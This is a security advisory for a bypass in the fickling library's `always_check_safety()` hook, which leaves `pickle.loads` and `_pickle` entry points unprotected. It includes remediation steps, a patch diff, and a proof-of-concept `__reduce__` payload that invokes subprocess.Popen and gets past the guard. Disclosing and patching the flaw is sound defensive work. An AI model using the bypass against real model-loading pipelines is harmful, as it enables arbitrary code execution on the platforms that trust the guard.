If your ML pipeline uses fickling's `always_check_safety()` as a security control for model deserialization, it is broken: attackers can bypass it entirely by targeting the `pickle.loads` or `_pickle.loads` entry points. Upgrade fickling to 0.1.9 immediately and treat any model loaded via fickling <= 0.1.8 as potentially compromised. Do not rely on fickling as a sole defense layer; add upstream model provenance controls.
## Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| fickling | pip | <= 0.1.8 | 0.1.9 |
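As a quick triage aid, the vulnerable range above can be checked programmatically. This is a minimal sketch; the helper names and the cutoff tuple are illustrative, not part of fickling's API, and the simple parser assumes plain `X.Y.Z` version strings (no pre-release suffixes):

```python
# Sketch: decide whether an installed fickling version string falls in the
# vulnerable range (<= 0.1.8). Helper names are illustrative, not fickling API.
def parse_version(v: str) -> tuple[int, ...]:
    """Parse a plain 'X.Y.Z' version string into a comparable tuple."""
    return tuple(int(part) for part in v.split("."))

def in_vulnerable_range(v: str) -> bool:
    """True for fickling versions <= 0.1.8, the affected range in the table."""
    return parse_version(v) <= (0, 1, 8)

print(in_vulnerable_range("0.1.8"))  # True: vulnerable
print(in_vulnerable_range("0.1.9"))  # False: patched
```

The installed version string itself can be obtained with `importlib.metadata.version("fickling")` on Python 3.8+.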
Any application or pipeline that loads models through fickling <= 0.1.8 and relies on `always_check_safety()` is affected.
## Severity & Risk
## Recommended Action
1. **Patch:** Upgrade fickling to 0.1.9 immediately: `pip install 'fickling>=0.1.9'`.
2. **Verify:** Confirm the patched version hooks `pickle.loads` and `_pickle.loads` by running fickling's regression test suite.
3. **Defense in depth:** Do not rely solely on fickling; implement model provenance controls (cryptographic signatures, hashes, trusted registries).
4. **Scan history:** Audit logs for model loads that occurred while fickling <= 0.1.8 was in use; treat any externally sourced model as suspect.
5. **Detect:** Alert on unexpected subprocess spawning or network calls during model load/deserialization operations.
6. **Block:** Consider the SafeTensors format as a pickle-free alternative for model serialization where possible.
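The verification step can be approximated without fickling's test suite by enumerating which pickle entry points still point at the original C implementations. This sketch assumes a CPython build with the `_pickle` accelerator module; the expectation that a correctly patched fickling >= 0.1.9 leaves the list empty after `always_check_safety()` is inferred from the fix commit, so also run the upstream regression tests:

```python
import pickle
import _pickle  # CPython's C-accelerated pickle (assumption: CPython build)

# The original C implementations. A complete global guard must replace every
# binding that applications actually call, not just pickle.load.
_C_ORIGINALS = {_pickle.load, _pickle.loads, _pickle.Unpickler}

def unpatched_entry_points() -> list[str]:
    """Names of pickle entry points still bound to the original C code.

    With no hook installed, all six names appear. After a complete global
    guard (e.g. fickling >= 0.1.9's always_check_safety(), per the fix
    commit), this list should be empty.
    """
    candidates = {
        "pickle.load": pickle.load,
        "pickle.loads": pickle.loads,
        "pickle.Unpickler": pickle.Unpickler,
        "_pickle.load": _pickle.load,
        "_pickle.loads": _pickle.loads,
        "_pickle.Unpickler": _pickle.Unpickler,
    }
    return sorted(name for name, fn in candidates.items() if fn in _C_ORIGINALS)

print(unpatched_entry_points())  # with no hook installed: all six names
```

On a vulnerable fickling (<= 0.1.8) with `always_check_safety()` enabled, this check would still report `pickle.loads`, `_pickle.load`, and `_pickle.loads`, which is exactly the bypass described below.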
## Classification
## Compliance Impact
This CVE is relevant to:
## Technical Details
### NVD Description
# Assessment

The missing pickle entrypoints `pickle.loads`, `_pickle.loads`, and `_pickle.load` were added to the hook in https://github.com/trailofbits/fickling/commit/8c24c6edabceab156cfd41f4d70b650e1cdad1f7.

# Original report

## Summary

`fickling.always_check_safety()` does not hook all pickle entry points. `pickle.loads`, `_pickle.loads`, and `_pickle.load` remain unprotected, enabling malicious payload execution despite global safety mode being enabled.

## Affected versions

`<= 0.1.8` (verified on current upstream HEAD as of 2026-03-03)

## Non-duplication check against published Fickling GHSAs

No published advisory covers hook-coverage bypass in `run_hook()`. Existing advisories are blocklist/detection bypasses (runpy, pty, cProfile, marshal/types, builtins, network constructors, OBJ visibility, etc.), not runtime hook coverage parity.

## Root cause

`run_hook()` patches only:

- `pickle.load`
- `pickle.Unpickler`
- `_pickle.Unpickler`

It does not patch:

- `pickle.loads`
- `_pickle.load`
- `_pickle.loads`

## Reproduction (clean upstream)

```python
import io
import pickle
import _pickle
from unittest.mock import patch

import fickling
from fickling.exception import UnsafeFileError


class Payload:
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, (['echo', 'BYPASS'],))


data = pickle.dumps(Payload())
fickling.always_check_safety()

# Bypass path: pickle.loads is not hooked, so the payload executes
with patch('subprocess.Popen') as popen_mock:
    pickle.loads(data)
print('bypass sink called?', popen_mock.called)  # True

# Control path: pickle.load is hooked and blocks the payload
with patch('subprocess.Popen') as popen_mock:
    try:
        pickle.load(io.BytesIO(data))
    except UnsafeFileError:
        pass
print('blocked sink called?', popen_mock.called)  # False
```

Observed on vulnerable code:

- `pickle.loads` executes payload
- `pickle.load` is blocked

## Minimal patch diff

```diff
--- a/fickling/hook.py
+++ b/fickling/hook.py
@@ def run_hook():
-    pickle.load = loader.load
+    pickle.load = loader.load
+    _pickle.load = loader.load
+    pickle.loads = loader.loads
+    _pickle.loads = loader.loads
```

## Validation after patch

- `pickle.loads`, `_pickle.loads`, and `_pickle.load` all raise `UnsafeFileError`
- sink not called in any path

Regression tests added locally in `test/test_security_regressions_20260303.py`:

- `test_run_hook_blocks_pickle_loads`
- `test_run_hook_blocks__pickle_load_and_loads`

## Impact

High-confidence runtime protection bypass for applications that trust `always_check_safety()` as a global guard.
## Exploitation Scenario
An adversary targets an ML platform that validates user-submitted PyTorch models with `fickling.always_check_safety()` before serving them. The adversary crafts a malicious `.pt` file embedding a pickle payload whose `__reduce__` method spawns a reverse shell or exfiltrates credentials. Because the payload is designed to be loaded via `pickle.loads` (the standard PyTorch load path), fickling's patched `pickle.load` hook is never triggered. The model passes validation, is deployed to the inference cluster, and executes arbitrary code with the service account's privileges on the first inference request. The attack requires no authentication beyond standard model-submission access.
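The scenario hinges on pickle's `__reduce__` protocol: unpickling attacker-controlled bytes is arbitrary code execution by design, because the serialized stream names a callable and its arguments, and the unpickler invokes them. A benign, self-contained illustration, using a harmless recording function in place of the reverse shell described above:

```python
import pickle

CALLS: list[str] = []

def record(msg: str) -> str:
    """Benign stand-in for subprocess.Popen in the original report."""
    CALLS.append(msg)
    return msg

class Payload:
    def __reduce__(self):
        # pickle serializes a *reference* to the callable plus its arguments;
        # unpickling then calls record(...) -- code runs at load time.
        return (record, ("executed during unpickling",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # no Payload class needed on the loading side
print(CALLS)        # ['executed during unpickling']
```

This is why the advisory recommends pickle-free formats such as SafeTensors where possible: no hook-coverage question arises if the format cannot encode callables at all.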